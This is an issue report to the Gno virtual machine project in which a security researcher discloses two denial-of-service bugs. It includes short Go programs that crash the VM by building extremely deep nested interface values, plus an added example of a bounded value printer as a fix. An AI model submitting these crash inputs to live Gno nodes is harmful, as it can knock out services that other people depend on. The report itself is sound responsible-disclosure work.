Gno: An interpreted, stack-based Go virtual machine to build succinct and composable apps + Gno.land: a blockchain for timeless code and fair open-source.
Two critical VM issues (denial of service attacks)
Hey everyone, I am a Web3 cybersecurity researcher working for Hacken specializing in layer 1 protocols and virtual machines. I met with the Gno team during Web3 Summit in Berlin where they introduced me to your project. I promised to check it out because it sounded very interesting to me. I spent a day playing with your project and virtual machine and managed to find two ways to crash it.
Critical issues
Crashing VM due to out-of-memory error by allocating a huge slice:
Crashing VM by creating very deep structure which is very CPU-intensive to process:
func init() {
	var x interface{}
	for {
		x = [1]interface{}{x}
	}
}
or alternatively:
package main

func main() {
	var x interface{}
	for i := 0; i < 10000; i++ {
		x = [1]interface{}{x}
	}
	for i := 0; i < 10000; i++ {
		println(x)
	}
}
I used the following test to reproduce these issues: crash_test.go.zip. You should put it in gno.land/pkg/sdk/vm and run it there with go test -v -run TestVMCrash.
Next steps
I highly recommend introducing Fuzzing in your project and undergoing a full audit before launching your product.
Feel free to contact me here or by sending an email to b.barwikowski@hacken.io if you need any help.
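One way a value printer could bound the work spent on the nested value from this report, shown as an added example that is not part of the original issue and not Gno's own code. The names `BoundedSprint`, `walk` and `ErrBudget`, and the limits 64 and 1024, are hypothetical.

```go
package main

import (
	"errors"
	"fmt"
	"strings"
)

var ErrBudget = errors.New("format budget exceeded")

// walk writes v to sb; each value costs one unit of *nodes, each level one of depthLeft.
func walk(sb *strings.Builder, v interface{}, depthLeft int, nodes *int) error {
	if *nodes--; depthLeft < 0 || *nodes < 0 {
		return ErrBudget // stop before recursing or printing any further
	}
	elems, ok := v.([]interface{})
	if a, isArr := v.([1]interface{}); isArr {
		elems, ok = a[:], true // the one-element array shape used in the report
	}
	if !ok {
		fmt.Fprint(sb, v) // leaf; a nil interface prints as <nil>
		return nil
	}
	sb.WriteByte('[')
	for _, e := range elems {
		if err := walk(sb, e, depthLeft-1, nodes); err != nil {
			return err
		}
	}
	sb.WriteByte(']')
	return nil
}

// BoundedSprint formats v within maxDepth levels and maxNodes values, else ErrBudget.
func BoundedSprint(v interface{}, maxDepth, maxNodes int) (string, error) {
	var sb strings.Builder
	if err := walk(&sb, v, maxDepth, &maxNodes); err != nil {
		return "", err
	}
	return sb.String(), nil
}

func main() {
	var x interface{} // constructed input: the nesting loop from the report
	for i := 0; i < 10000; i++ {
		x = [1]interface{}{x}
	}
	fmt.Println(BoundedSprint(x, 64, 1024))
}
```

The depth limit caps recursion on deep values and the node budget caps total work on wide ones, so the cost of one print call no longer depends on the size of the value.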